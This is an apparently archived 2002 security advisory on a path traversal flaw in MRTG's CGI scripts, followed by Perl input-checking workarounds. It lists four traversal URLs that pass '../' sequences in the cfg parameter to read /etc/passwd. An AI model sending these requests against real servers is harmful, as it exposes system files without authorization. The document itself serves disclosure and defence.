3rd Feb 2002 [SBWID-5059]
COMMAND
mrtg monitoring web interface may be fooled to read system files
SYSTEMS AFFECTED
MRTG 2.9.18pre1 and previous ??
PROBLEM
UkR-XblP of UkR security team reported :
The following is self explanatory -
http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
SOLUTION
Patch available soon ??
http://www.mrtg.org
Workaround, parse input :
$input =~ s/[(\\.\\.)|\\/]//g;
Update (04 February 2002) \"SJ\" proposed : ======
my $SECMSG = \'Pliz dont hekk us\\n\";
if(!defined $q->param(\'cfg\')){ die \"missing cfg file\\n\"; }
my $xx = $q->param(\'cfg\');
if($xx =~ /\\.\\.|\\/\\/|\\.\\//){ die $SECMSG; }
if($xx =~ tr/a-zA-Z0-9_\\-//dc){ die $SECMSG; }
you could also check the ownership of $cfgfile and deny opening root
(and maybe other) owned files.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
